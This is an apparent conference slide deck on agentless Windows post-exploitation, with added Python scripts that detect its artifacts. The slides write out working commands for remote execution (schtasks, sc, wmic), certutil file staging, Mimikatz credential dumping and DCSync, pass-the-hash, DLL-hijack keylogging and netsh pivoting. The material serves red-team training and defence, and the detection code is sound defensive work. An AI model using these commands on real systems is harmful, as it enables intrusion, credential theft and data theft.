
Agentless Post Exploitation

Raphael Mudge
rsmudge@gmail.com

Agentless Post Exploitation

•  Remote control of target with built-in services
•  Benefits
   –  Similar results, without malware on all targets
   –  Different artifacts

•  Drawbacks
   –  Requires accessible services

Overview

•  Administrator Rights
•  Execute
•  Upload and Download
•  Process Manipulation
•  Recovering Credentials
•  Using Credentials
•  User Exploitation
•  Pivoting
•  DEMO!

Administrator Rights

•  Administrator trusts allow us to do things!
•  Interact w/ admin shares and schedule processes
•  Both Local and Domain Administrator matter!!

•  Am I an admin?

   dir \\host\C$
   at \\host

Execute

•  Old school: at, schtasks, sc, wmic

   net time \\target
   at \\target HH:mm c:\path\to\program

   Deprecated as of Windows 8 | 2012 server

Execute

•  Old school: at, schtasks, sc, wmic

   schtasks /create /tn NAME /tr c:\path\program /sc once /st 00:00 /S target /RU System
   schtasks /run /tn NAME /S target

Execute

•  Old school: at, schtasks, sc, wmic

   sc \\target create name binpath= "c:\path\program"
   sc \\target start name

   Make sure there's a space after binpath=

Execute

•  Old school: at, schtasks, sc, wmic

   wmic /node:"target" process call create "program"
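Each of the four "old school" methods above leaves a Windows event behind: a remote at/schtasks creates a scheduled task (Security 4698 on the target), sc \\target create installs a service (System 7045 on the target), and the command itself is a process creation (Security 4688, or Sysmon 1) on the machine it was typed on. The following triage script is an added example for this deck, not the author's code; it scans a few constructed, pre-flattened event records (a real pipeline would pull the same fields out of the EVTX XML, for 4698 from the TaskContent element) and reports those that match the artifacts these commands leave.

```python
"""Triage Windows events for remote-execution artifacts of at/schtasks/sc/wmic.

Added example, not from the deck. Event IDs used:
  4698 (Security) - scheduled task created   (at / schtasks /create /S target)
  7045 (System)   - service installed        (sc \\target create ... binpath=)
  4688 (Security) - process created          (the operator-side command line)
All records below are constructed samples.
"""
import re
from typing import Optional

SAMPLE_EVENTS = [
    # 4698 flattened: run_as and command come from the task's XML content.
    {"event_id": 4698, "host": "WS01", "subject": "ACME\\jdoe",
     "task_name": "\\NAME", "run_as": "SYSTEM", "command": "c:\\path\\program"},
    {"event_id": 7045, "host": "WS01", "service_name": "name",
     "image_path": "c:\\path\\program", "account": "LocalSystem"},
    {"event_id": 4688, "host": "WS02", "subject": "ACME\\svc_backup",
     "command_line": 'wmic /node:"WS01" process call create "program"'},
    {"event_id": 4688, "host": "WS02", "subject": "ACME\\jdoe",
     "command_line": "notepad.exe"},
    # Routine service install from a system directory: should not be flagged.
    {"event_id": 7045, "host": "WS01", "service_name": "Spooler",
     "image_path": "C:\\Windows\\System32\\spoolsv.exe", "account": "LocalSystem"},
]

SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# sc \\host ... or at \\host ..., with or without a path/.exe on the tool name
_SC_AT_REMOTE_RE = re.compile(r"^(?:\S*\\)?(?:sc|at)(?:\.exe)?\s+\\\\")


def _outside_system_dirs(path: str) -> bool:
    return not path.lower().strip('"').startswith(SYSTEM_DIRS)


def _is_remote_exec_command(cmdline: str) -> bool:
    """Does this command line drive one of the four tools at a remote host?"""
    c = " ".join(cmdline.lower().split())          # normalise whitespace
    return (("wmic" in c and "/node:" in c)
            or ("schtasks" in c and " /s " in c)
            or _SC_AT_REMOTE_RE.match(c) is not None)


def flag_event(ev: dict) -> Optional[str]:
    """Return a short reason if the event looks like remote execution, else None."""
    eid = ev["event_id"]
    if eid == 4698:
        # schtasks /RU System with the program outside the system directories
        if ev.get("run_as", "").upper() == "SYSTEM" and _outside_system_dirs(ev["command"]):
            return f"task {ev['task_name']} runs {ev['command']} as SYSTEM"
    elif eid == 7045:
        # sc \\target create leaves a 7045 whose binary is wherever binpath= pointed
        if _outside_system_dirs(ev["image_path"]):
            return f"service {ev['service_name']} installed from {ev['image_path']}"
    elif eid == 4688:
        if _is_remote_exec_command(ev.get("command_line", "")):
            return f"{ev['subject']} ran remote execution command: {ev['command_line']}"
    return None


def scan(events) -> list:
    """(host, reason) for every event that matches."""
    return [(ev["host"], reason) for ev in events if (reason := flag_event(ev))]


if __name__ == "__main__":
    for host, reason in scan(SAMPLE_EVENTS):
        print(f"{host}: {reason}")
```

The 4688 check only fires on the operator's machine, so it needs process-creation auditing with command-line logging turned on there; the 4698 and 7045 checks work from the target's own logs and catch the blind methods even when the operator's box is not monitored.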

Execute (Non-blind)

•  PowerShell Remoting (WinRM)

   Invoke-Command -ComputerName target -ScriptBlock {command}

Execute (Non-blind)

•  PowerSploit's Invoke-WmiCommand.ps1

   Invoke-WmiCommand -ComputerName target -Payload {command} | select -exp "PayloadOutput"

Upload & Download

•  Push & pull files via UNC path \\target\share?
   –  copy myfile \\target\share
   –  copy \\target\share\theirfile myfilenow

•  Default shares

•  No Default Shares? Turn them on:
   –  net share C$
   –  net share admin$

   Share     Maps to
   C$        C:\
   ADMIN$    %SystemRoot% (e.g., c:\windows)

Upload ☹

•  Can you run commands remotely?
   –  Base64 encode local file
   –  Run echo "part of base64 string" >> dest.b64

•  Again and again…

   –  Run certutil.exe to decode remote file

      certutil.exe -decode dest.b64 dest.dll

https://gist.github.com/mattifestation/47f9e8a431f96a266522
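The echo-and-certutil upload above is noisy in process-creation logs: the same destination file receives a run of appends whose payload is nothing but base64 characters, then certutil -decode is pointed at it. The script below is an added example, not from the deck or the gist it links; it groups constructed 4688/Sysmon-1 style command lines by destination, reports destinations that are staged and decoded this way, and reassembles the staged file from the logged chunks so an analyst can examine it. The sample file content is a constructed text stand-in, not a real binary.

```python
"""Detect chunked echo >> file.b64 staging followed by certutil -decode.

Added example, not the deck's code. Input is a sequence of process command
lines in the order they were logged; output is which files were staged,
which were decoded, and (optionally) the reassembled staged content.
"""
import base64
import re
from collections import defaultdict

# echo "<base64 run of 16+ chars>" >> <destination>
ECHO_APPEND_RE = re.compile(r'echo\s+"?([A-Za-z0-9+/=]{16,})"?\s*>>\s*(\S+)', re.IGNORECASE)
# certutil -decode <source> <output>   (also accepts /decode)
CERTUTIL_DECODE_RE = re.compile(r'certutil(?:\.exe)?\s+[-/]decode\s+(\S+)\s+(\S+)', re.IGNORECASE)
MIN_CHUNKS = 3   # fewer appends than this is not reported as staging on its own

# Constructed stand-in for the transferred file (NOT a real binary).
_CONSTRUCTED_FILE = b"Constructed sample content standing in for a DLL; it is not a real binary." * 3
_B64 = base64.b64encode(_CONSTRUCTED_FILE).decode()
CHUNK = 74   # 296 base64 characters -> exactly four echo commands

# Constructed command lines, in logged order: four appends, the decode, then two benign lines.
SAMPLE_COMMAND_LINES = (
    [f'cmd.exe /c echo "{_B64[i:i + CHUNK]}" >> c:\\windows\\temp\\dest.b64'
     for i in range(0, len(_B64), CHUNK)]
    + ['certutil.exe -decode c:\\windows\\temp\\dest.b64 c:\\windows\\temp\\dest.dll',
       'cmd.exe /c echo build ok >> c:\\logs\\build.log',
       'certutil.exe -verify -urlfetch c:\\certs\\corp.cer']
)


def analyze(command_lines) -> dict:
    """Group base64 appends by destination and tie them to later certutil decodes."""
    appends = defaultdict(list)      # destination (lower-cased) -> list of chunks
    decoded = []
    for line in command_lines:
        m = ECHO_APPEND_RE.search(line)
        if m:
            appends[m.group(2).lower()].append(m.group(1))
            continue
        m = CERTUTIL_DECODE_RE.search(line)
        if m:
            src, dst = m.group(1).lower(), m.group(2).lower()
            chunks = appends.get(src, [])
            if chunks:   # a decode of a file we watched being staged
                decoded.append({"source": src, "output": dst, "chunks": len(chunks),
                                "b64_length": len("".join(chunks))})
    staged = {dest: len(chunks) for dest, chunks in appends.items() if len(chunks) >= MIN_CHUNKS}
    return {"staged": staged, "decoded": decoded}


def recover(command_lines, dest: str) -> bytes:
    """Reassemble the staged file for `dest` from the logged echo chunks."""
    chunks = [m.group(1) for line in command_lines
              if (m := ECHO_APPEND_RE.search(line)) and m.group(2).lower() == dest.lower()]
    return base64.b64decode("".join(chunks))


if __name__ == "__main__":
    report = analyze(SAMPLE_COMMAND_LINES)
    print(report)
    print(recover(SAMPLE_COMMAND_LINES, "c:\\windows\\temp\\dest.b64")[:40])
```

Because the transfer is reconstructed entirely from command-line auditing, the staged file can be examined even after the attacker deletes dest.b64 and the decoded output from the target.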

Process Manipulation

•  List Processes

   tasklist /v /S target

•  Kill Process

   taskkill /S target /PID PID /F

Process Manipulation

•  List Processes

   wmic /node:"target" process list full
   wmic /node:"target" process list brief

•  Kill Process

   wmic /node:"target" where (ProcessID="##") call terminate

Recovering Credential Material

•  PowerSploit's Invoke-Mimikatz (WinRM)

   Invoke-Mimikatz -ComputerName target

   Or…

   Invoke-Mimikatz -ComputerName target -Command command

Recovering Credential Material

•  DcSync via mimikatz

   lsadump::dcsync /domain:DOMAIN.fqdn /user:DOMAIN\user
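DCSync works by asking a domain controller for directory replication, and the DC audits that request (when Audit Directory Service Access is enabled) as Security event 4662 carrying the extended rights DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) in its Properties field. Genuine replication comes from other domain controllers' machine accounts, so the detection is simply "replication rights requested by anyone else". The script below is an added example, not from the deck; the 4662 records and the DC list are constructed, and any directory-sync service accounts an environment legitimately uses would have to be added to the allow list.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.

Added example, not the deck's code. Sample events are constructed.
"""
import re
from typing import Optional

DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Accounts allowed to replicate: the DCs' machine accounts (assumption: from
# inventory). Add directory-sync service accounts here if the domain has them.
ALLOWED_REPLICATORS = {"DC01$", "DC02$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

# Constructed 4662 records. The Properties field on a real event lists the
# access type (%%7688 = Control Access) followed by the right GUIDs in braces.
SAMPLE_4662 = [
    {"computer": "DC01", "subject_user": "DC02$", "subject_domain": "ACME",
     "properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"computer": "DC01", "subject_user": "jdoe", "subject_domain": "ACME",
     "properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Constructed placeholder GUID standing in for some unrelated right.
    {"computer": "DC01", "subject_user": "jdoe", "subject_domain": "ACME",
     "properties": "%%7688\n\t{00000000-0000-0000-0000-000000000000}"},
]


def replication_rights(properties: str) -> set:
    """The replication-right GUIDs present in a 4662 Properties field."""
    return {g for g in GUID_RE.findall(properties.lower()) if g in REPLICATION_RIGHTS}


def classify(ev: dict) -> Optional[str]:
    """Alert text for a suspicious replication request, or None."""
    rights = replication_rights(ev["properties"])
    if not rights:
        return None                       # not a replication request at all
    if ev["subject_user"].upper() in ALLOWED_REPLICATORS:
        return None                       # normal DC-to-DC replication
    return (f"DCSync-style replication by {ev['subject_domain']}\\{ev['subject_user']} "
            f"against {ev['computer']} ({len(rights)} replication right(s))")


def scan_4662(events) -> list:
    return [r for ev in events if (r := classify(ev))]


if __name__ == "__main__":
    for alert in scan_4662(SAMPLE_4662):
        print(alert)
```

The request must be audited on the DC that served it, so the System Access Control List on the domain object has to include Everyone for Control Access for the event to appear at all; without that SACL the 4662 is never written.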

Using Credentials (Access Tokens)

•  Created after logon
•  Associated with each process and thread
•  Contains:
   –  User and Group Information
   –  A list of privileges on local computer
   –  Restrictions (user/group rights taken away)
   –  Reference to credentials (supports single sign-on)

•  Persists in memory until reboot

Using Credentials

•  Credentials

   runas /netonly /user:DOMAIN\user program

•  Pass-the-hash (Mimikatz)

   sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:program

Your Payload may have built-in versions of these

http://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/

User Exploitation

•  Screenshots with Problem Step Recorder
   –  Start the recorder

      psr.exe /start /gui 0 /output c:\users\user\out.zip

   –  Stop the recorder

      psr.exe /stop


•  How to run in user's desktop session?

   schtasks /IT /RU DOMAIN\user /RP password …

https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-remotely-with-metasploit/

User Exploitation

•  Log keystrokes via DLL Hijacking
   –  Compile a keystroke logger as a DLL
   –  Copy to \\target\C$\windows\linkinfo.dll
   –  Remotely kill explorer.exe
   –  Pull keystroke log file via C$ share

Pivoting

•  Create a port forward with netsh

   netsh interface portproxy add v4tov4 listenport=LPORT listenaddress=0.0.0.0 connectport=FPORT connectaddress=FHOST

•  Requires IPv6 stack is installed.
•  Port forward persists on reboot. CLEANUP!

   netsh interface portproxy reset
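Because a portproxy entry survives reboot (it is stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy), auditing hosts for leftover forwards is worth doing after any engagement or incident. The parser below is an added example, not from the deck: it reads the text that netsh interface portproxy show all prints (the sample here is constructed in that layout), lists every forward, marks those listening on a non-loopback address as reachable from the network, and produces the per-entry netsh delete command for targeted cleanup where a blanket reset is not wanted.

```python
"""Audit netsh portproxy forwards from `netsh interface portproxy show all` output.

Added example, not the deck's code. The sample output is constructed in the
shape netsh prints: one block per address-family pair, a header row, a
dashed rule, then one row per forward.
"""
import re

SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        10.0.0.5        443
127.0.0.1       2222        192.168.1.20    22

Listen on ipv6:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
::              3389        10.0.0.7        3389
"""

SECTION_RE = re.compile(r"Listen on ip(v[46]):\s+Connect to ip(v[46]):", re.IGNORECASE)
ROW_RE = re.compile(r"^(\S+)\s+(\d{1,5})\s+(\S+)\s+(\d{1,5})$")
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_portproxy(text: str) -> list:
    """Return one dict per forward, tagged with its v4tov4/v6tov4/... kind."""
    forwards, kind = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.search(line)
        if m:
            kind = f"{m.group(1).lower()}to{m.group(2).lower()}"   # e.g. v4tov4
            continue
        m = ROW_RE.match(line)
        if m and kind:
            listen_addr, listen_port, connect_addr, connect_port = m.groups()
            forwards.append({
                "kind": kind,
                "listen_address": listen_addr, "listen_port": int(listen_port),
                "connect_address": connect_addr, "connect_port": int(connect_port),
                # a listener on 0.0.0.0 / :: / a real interface address is exposed
                "network_reachable": listen_addr not in LOOPBACK,
            })
    return forwards


def cleanup_commands(forwards) -> list:
    """The netsh delete command for each forward (for targeted cleanup)."""
    return [f"netsh interface portproxy delete {f['kind']} "
            f"listenport={f['listen_port']} listenaddress={f['listen_address']}"
            for f in forwards]


if __name__ == "__main__":
    found = parse_portproxy(SAMPLE_NETSH_OUTPUT)
    for f in found:
        flag = "EXPOSED" if f["network_reachable"] else "local"
        print(f"{flag:8} {f['kind']} {f['listen_address']}:{f['listen_port']} -> "
              f"{f['connect_address']}:{f['connect_port']}")
    print("\n".join(cleanup_commands(found)))
```

On a clean workstation the list should be empty; any entry at all is a finding, and one listening on 0.0.0.0 or :: has turned the host into a relay for whatever it connects to.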

DEMONSTRATION

Stealing Source Code from ACME

Summary

•  Administrator Rights
•  Execute
•  Upload and Download
•  Process Manipulation
•  Recovering Credentials
•  Using Credentials
•  User Exploitation
•  Pivoting
•  DEMO!
